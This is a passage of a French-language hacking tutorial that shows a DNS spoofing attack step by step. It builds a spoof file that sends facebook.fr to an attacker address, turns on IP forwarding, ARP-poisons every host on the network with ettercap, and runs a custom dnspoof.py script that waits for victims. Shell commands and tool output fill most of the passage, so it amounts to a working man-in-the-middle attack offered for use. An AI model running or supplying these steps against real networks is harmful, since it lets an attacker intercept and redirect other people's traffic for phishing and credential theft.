Application
Commençont d'abord par crée notre fichier dns.spoof avec les informations necessaire pour rediriger toute demandes de résolution du nom de domaine facebook.fr vers l'adresse 192.168.178.48
root@St0rn:~/Desktop/DNS# vi dns.spoof facebook.fr A 192.168.178.48 www.facebook.fr A 192.168.178.48 :wq root@St0rn:~/Desktop/DNS# cat dns.spoof facebook.fr A 192.168.178.48 www.facebook.fr A 192.168.178.48
Maintenant nous devont réussir à voir le traffic sur le réseau pourrécupérer le numero d'identification (ID), nous allons donc nous placer en Man In THe Middle sur le réseau
root@St0rn:~/Desktop/DNS# echo 1 > /proc/sys/net/ipv4/ip_forward root@St0rn:~/Desktop/DNS# cat /proc/sys/net/ipv4/ip_forward 1 root@St0rn:~/Desktop/DNS# ettercap -Tqi eth0 -M arp:remote // // ettercap 0.8.0 copyright 2001-2013 Ettercap Development Team Listening on: eth0 -> C8:9C:DC:6A:8A:B0 192.168.178.48/255.255.255.0 fe80::ca9c:dcff:fe6a:8ab0/64 SSL dissection needs a valid 'redir_command_on' script in the etter.conf file Privileges dropped to UID 65534 GID 65534... 33 plugins 42 protocol dissectors 57 ports monitored 16074 mac vendor fingerprint 1766 tcp OS fingerprint 2182 known services Randomizing 255 hosts for scanning... Scanning the whole netmask for 255 hosts... * |==================================================>| 100.00 % 2 hosts added to the hosts list... ARP poisoning victims: GROUP 1 : ANY (all the hosts in the list) GROUP 2 : ANY (all the hosts in the list) Starting Unified sniffing... Text only Interface activated... Hit 'h' for inline help
Maintenant que nous controlons le traffic de tout le réseau ils nous reste plus qu'a lancer notre script et d'attendre que quelqu'un se rende sur le domaine que nous avons configuré dans dns.spoof
root@St0rn:~/Desktop/DNS# python dnspoof.py eth0
Notre script réagit à une demande de résolution
Et voici le résultat sur la machine victime